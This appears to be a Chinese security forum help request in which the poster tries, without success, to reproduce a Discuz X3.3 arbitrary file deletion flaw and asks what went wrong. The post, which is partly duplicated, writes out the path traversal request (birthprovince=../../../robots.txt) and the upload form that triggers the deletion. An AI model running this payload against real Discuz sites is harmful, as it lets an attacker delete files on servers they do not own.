-
-
未解决 [悬赏]discuz x3.3任意文件删除漏洞删除失败 10.00雪花
-
发表于: 2017-10-2 03:20
-
①构造提交
http://dz.com/3.3/home.php?mod=spacecp&ac=profile&op=base
birthprovince=../../../robots.txt&profilesubmit=1&formhash=30ff14a7
②上传 robots.txt文件
<formaction="home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"enctype="multipart/form-data"> <inputtype="file"name="birthprovince"id="file"/>
<inputtype="text"name="formhash"value="30ff14a7"/></p>
<inputtype="text"name="profilesubmit"value="1"/></p>
<inputtype="submit"value="Submit"/>
</form>
③burpsuite改包
问 ① : 改了如图 请问哪里操作失误 才不行的
问 ② :spacecp/spacecp_profile.php里的$_G['cache']['profilesetting']是哪里来的
http://dz.com/3.3/home.php?mod=spacecp&ac=profile&op=base
birthprovince=../../../robots.txt&profilesubmit=1&formhash=30ff14a7
②上传 robots.txt文件
<formaction="home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"method="POST"enctype="multipart/form-data"> <inputtype="file"name="birthprovince"id="file"/>
<inputtype="text"name="formhash"value="30ff14a7"/></p>
<inputtype="text"name="profilesubmit"value="1"/></p>
<inputtype="submit"value="Submit"/>
</form>
③burpsuite改包
问 ① : 改了如图 请问哪里操作失误 才不行的
问 ② :spacecp/spacecp_profile.php里的$_G['cache']['profilesetting']是哪里来的
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
